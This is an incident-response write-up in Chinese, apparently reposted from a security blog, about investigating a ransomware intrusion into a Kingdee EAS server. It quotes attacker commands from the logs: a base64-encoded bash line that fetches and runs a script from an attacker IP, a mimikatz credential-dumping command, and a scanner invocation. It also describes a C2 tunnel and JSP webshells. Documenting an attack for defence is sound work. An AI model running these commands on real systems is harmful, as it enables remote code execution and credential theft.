文章总结： 文档记录了金蝶EAS系统遭受勒索攻击的应急响应过程。攻击者通过外网EAS漏洞入侵，在内网使用扫描工具f和mimikatz进行横向移动，部署了daemon反向代理和jspwebshell后门。关键发现包括攻击路径分析和及时阻断加密指令，建议封禁恶意IP68.183.109.255、209.97.175.77并升级官方最新补丁。 综合评分： 82 文章分类： 应急响应,漏洞分析,威胁情报,安全运营,解决方案

金蝶 EAS 系统勒索攻击行为排查

SharkJ0001 SharkJ0001

Neon-X Sec

2026年4月8日 16:51 河北

1.已知的告警信息如下

从安全设备监控到内网有工具名为 f 在扫描内网其他主机

攻击工具位置在/tmp/.tmp/f

检测说明进程f的启动参数为./f -h 10.x.0.0/16 -nopoc -nobr -o 255b.txt，符合可疑进程参数的特性。告警说明攻击者通过使用扫描工具进行内网服务探测

同段失陷主机执行mimikatz.exe

进程所属用户：xxx进程命令行：mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit

命令执行

进程文件路径：/usr/bin/bash文件权限：0755进程命令行：bash -c {echo,c2ggLWMgIiQoY3VybCAtZnNTTCBodHRwOi8vMjA5Ljk3LjE3NS43Ny9kKSI=}|{base64,-d}|{bash,-i}

2.排查中部分操作

2.1命令执行

base64解码后为 sh -c “$(curl -fsSL http://209.97.175.77/d)”

查看历史命令发现执行痕迹

命令解释如下

• 命令的核心：$(…) (命令替换) $(curl -fsSL http://209.97.175.77/d) 这部分是一个 “命令替换”。 Shell（如bash）在执行这行命令之前，会优先执行 $(…) 里面的内容。 curl -fsSL http://209.97.175.77/d 的作用是从指定的URL获取内容，并将这些内容输出到标准输出（stdout），也就是直接打印在屏幕上。

  关键点：curl 在这里只是把文件内容当作文本流读取出来，并没有使用 -o 或 –output 参数将它写入到磁盘上的一个新文件。

• 命令的执行：sh -c “…” sh -c 的作用是让 sh（shell解释器）去执行后面双引号内的一串字符串，把它当作命令来运行。 由于 $(…) 部分已经被执行并替换成 curl 获取到的实际内容，所以整个命令最终等价于：

sh -c “<恶意脚本的实际内容>“

关键点：sh 接收到的是一个纯文本字符串（即恶意脚本的代码），它直接在内存中解析并执行这段代码，全程不需要、也不会在硬盘上创建一个名为 d 的物理文件。

2.2部署反向代理

在金蝶EAS目录下 easapp/eas/eas/server/bin下发现 daemon 的可疑程序

执行命令 ps -ef | grep daemon  找到该文件相关的进程，该进程会主动连接 C2 服务器 68.183.109.255:22168，并在本地监听 7000 端口，充当反向代理/隧道客户端，用于建立远程控制通道

并且同级目录下有pingtunnel_xxxx.log文件pingtunnel为ICMP代理穿透工具

2.3后门文件

根据官方建议查找可疑jsp文件，筛选出所有的jsp文件

官方发布 勒索病毒-EAS日志收集&后门排查指导https://vip.kingdee.com/article/828579488446462976?get_from=article-id&lang=zh-CN&productLineId=8

find . -name “*.jsp” -type f -printf “%T+ %p\n” | sort -r >jsp.log

通过文件内容分析，在路径

/easapp/eas/eas/server/deploy/eas.ear/sso_web.war

下的css.jsp和favi.jsp 为 jsp webshell

2.4攻击路径

当前排查检测到攻击路径为，外网EAS失陷控制内网服务器，内网服务器（Linux）通过RDP登录Windows，被上传mimikatz.exe，内网抓hash。

2.5后续攻击行为推测

内网横向抓取更多资产，通过部署的代理发布指令，在拿下一定的资产后，综合获取数据，执行勒索进程，由于发现及时内网攻击面未能扩散，攻击者未下发加密指令。

3建议

建议封禁以下IP在防火墙，若有设备产生相似告警及时排查处置

68.183.109.255

209.97.175.77

由于当前版本的EAS过低，无相关日志能支持漏洞点定位，建议所有涉及使用EAS升级官方最新补丁

补丁地址：

https://vip.kingdee.com/knowledge/79145189234578944?productLineId=8&isKnowledge=2&lang=zh-CN

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：Neon-X Sec SharkJ0001 SharkJ0001《金蝶 EAS 系统勒索攻击行为排查》